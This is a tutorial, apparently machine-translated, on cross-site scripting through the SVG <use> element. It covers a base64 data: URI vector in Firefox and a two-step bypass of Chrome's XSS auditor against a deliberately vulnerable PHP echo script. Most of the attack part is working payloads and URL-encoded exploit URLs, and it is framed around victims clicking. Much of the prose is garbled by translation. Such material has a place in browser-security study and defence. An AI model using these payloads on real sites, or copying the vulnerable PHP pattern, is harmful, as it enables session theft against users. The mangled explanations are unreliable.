======================================SVG-<use> element======================================The <use> element in SVG is used to reuse other elements. It is mainly used to join <defs> and alike, but we use it to reference element elements in the external SVG file and be referenced through its ID, in the xlink: href attribute of the <use> label, it starts with the '#' Well character. The reference of an external element is similar to the following basic structure:
Test.html
<svg><use xlink:href=‘external.svg#rectangle‘ /></svg>
external.svg:
<svg id="rectangle" xmlns="http://www.w3.org/2000/svg"xmlns:xlink="http://www.w3.org/1999/xlink"width="100" height="100"><a xlink:href="javascript:alert(location)"><rect x="0" y="0" width="100" height="100" /></a></svg>
The sxternal. SVG file starts with the <SVG> label, whose ID is set to rectangle (rectangle), and uses the <rect> label to draw a rectangle. You can use the <A> wrap <rect> label to create a hyperlink. Using the URL protocol of JavaScript, you can click the hyperlink to execute JavaScript after clicking. Although SVG is loaded through the <use> label, JavaScript will be executed. Note that it can only load SVG files and must meet the same-source policy.
======================================
Firefox======================================Because the external SVG file to be loaded must be of the same source, this feature does not seem to work as a useful XSS attack vector, but Firefox will help us increase this attack vector first, you can use the data: URL protocol, it allows us to create an internal file in our busy schedule. It requires the correct mime-type, which is image/SVG + XML here. Mimie-type is followed by our attack load or keyword base64. In particular, because the data is base64 encoded, this helps avoid the problem of breaking through the HTML structure. Now we no longer have to rely on another file on the server:
test.html:
<svg><use xlink:href="data:image/svg+xml;base64,PHN2ZyBpZD0icmVjdGFuZ2xlIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiAgICB3aWR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+DQo8YSB4bGluazpocmVmPSJqYXZhc2NyaXB0OmFsZXJ0KGxvY2F0aW9uKSI+PHJlY3QgeD0iMCIgeT0iMCIgd2lkdGg9IjEwMCIgaGVpZ2h0PSIxMDAiIC8+PC9hPg0KPC9zdmc+#rectangle" /></svg>
Base64 load after decoding:
<svg id="rectangle" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"width="100" height="100"><a xlink:href="javascript:alert(location)"><rect x="0" y="0" width="100" height="100" /></a></svg>
The browser will display a black rectangle, and its location will pop up when it clicks. but why bother the victim to click? They never do what they should do :) external. the <SCRIPT> label in SVG is not parsed, but SVG supports the <foreignobject> element to elaborate the extended attributes required by this object, it is possible to load non-SVG elements, which means that <IFRAME>, <embed>, and all other supported HTML elements are now available, we can select and execute JavaScript from the heap elements. Here we use the <embed> + javascripturl protocol to see the following SVG:
<svg id="rectangle"xmlns="http://www.w3.org/2000/svg"xmlns:xlink="http://www.w3.org/1999/xlink"width="100" height="100"><script>alert(1)</script><foreignObject width="100" height="50"requiredExtensions="http://www.w3.org/1999/xhtml"><embed xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert(location)" /></foreignObject></svg>
It loads embedded tags through <foreignobject>, uses javascripturl protocol to execute JavaScript, then uses base64 to encode the load, and loads test.html using data: protocol.
<svg><use xlink:href="data:image/svg+xml;base64,PHN2ZyBpZD0icmVjdGFuZ2xlIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiAgICB3aWR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg0KIDxmb3JlaWduT2JqZWN0IHdpZHRoPSIxMDAiIGhlaWdodD0iNTAiDQogICAgICAgICAgICAgICAgICAgcmVxdWlyZWRFeHRlbnNpb25zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4NCgk8ZW1iZWQgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiIHNyYz0iamF2YXNjcmlwdDphbGVydChsb2NhdGlvbikiIC8+DQogICAgPC9mb3JlaWduT2JqZWN0Pg0KPC9zdmc+#rectangle" /></svg>
In this case, test.html is opened with firefox27, and location is displayed:
In this way, we have another vector that can execute Javascript in SVG. In addition, the attack load contains a <SCRIPT> alert (1) </SCRIPT>, this proves that the <SCRIPT> tag will not be parsed.
======================================ChromeXSS auditor Bypass======================================Chrome does not support the data: URL protocol in the <use> tag xlink: href attribute, in addition, no method has been found to execute JavaScript without user interaction. However, in the case of right user interaction at least, bypass blink/WebKit XSS auditor does not require parameter pollution, one parameter is enough. Blink/WebKit XSS audito cannot capture XSS attacks that split parameters into two or more.
Take a look at this PHP script (XSS. php ):
<?phpecho "<body>";echo $_GET[‘x‘];echo "</body>";?>
This script has the XSS vulnerability, but the following loads will trigger XSS auditor:
http://site.com/xss.php?x=<svg><a xlink:href="javascript:alert(location)"><rect x="0" y="0" width="100" height="100" /></a></svg>
Therefore, let's use the <use> element.
======================================CreatingSVG on the fly======================================We want to load another SVG file, so we use<SVG> <use xlink: href = start
But wait a moment, it must satisfy the same source. We cannot use the data pseudo protocol. How can we get the files on the server? It's easy. We use the XSS vulnerability twice in a row! First, we construct a URL to create an SVG that contains a javascript URL as a pseudo-protocol.
http://site.com/xss.php?x=<svg id="rectangle" xmlns="http://www.w3.org/2000/svg"xmlns:xlink="http://www.w3.org/1999/xlink"width="100" height="100"><a xlink:href="javascript:alert(location)"><rect class="blue" x="0" y="0" width="100" height="100" /></a></svg>
If you paste the entire URL into a browser without XSS filter, a black rectangle will appear immediately. But as mentioned above, Chrome's XSS auditor will capture this attack. Let's continue: now we need to use the created SVG file in the <use> element, create a URL like this:
http://site.com/xss.php?x=<svg><use height=200 width=200xlink:href=‘http://vulnerabledomain.com/xss.php?x=<svg id="rectangle"xmlns="http://www.w3.org/2000/svg"xmlns:xlink="http://www.w3.org/1999/xlink"width="100" height="100"><a xlink:href="javascript:alert(location)"><rect class="blue" x="0" y="0" width="100" height="100"/></a></svg>#rectangle‘/></svg>
Do not forget to perform URL encoding:
http://site.com/xss.php?x=%3Csvg%3E%3Cuse%20height=200%20width=200%20xlink:href=%27http://site.com/xss.php?x=%3Csvg%20id%3D%22rectangle%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Axlink%3D%22http%3A%2F%2Fwww.w3.org%2F1999%2Fxlink%22%20%20%20%20width%3D%22100%22%20height%3D%22100%22%3E%3Ca%20xlink%3Ahref%3D%22javascript%3Aalert%28location%29%22%3E%3Crect%20class%3D%22blue%22%20x%3D%220%22%20y%3D%220%22%20width%3D%22100%22%20height%3D%22100%22%20%2F%3E%3C%2Fa%3E%3C%2Fsvg%3E%23rectangle%27/%3E%3C/svg%3E
This will display the rectangle, and click it to execute alert, but this time does not trigger XSS auditor :)
Reference:Http://insert-script.blogspot.com/2014/02/svg-fun-time-firefox-svg-vector.html
Bypassing XSS auditor with SVG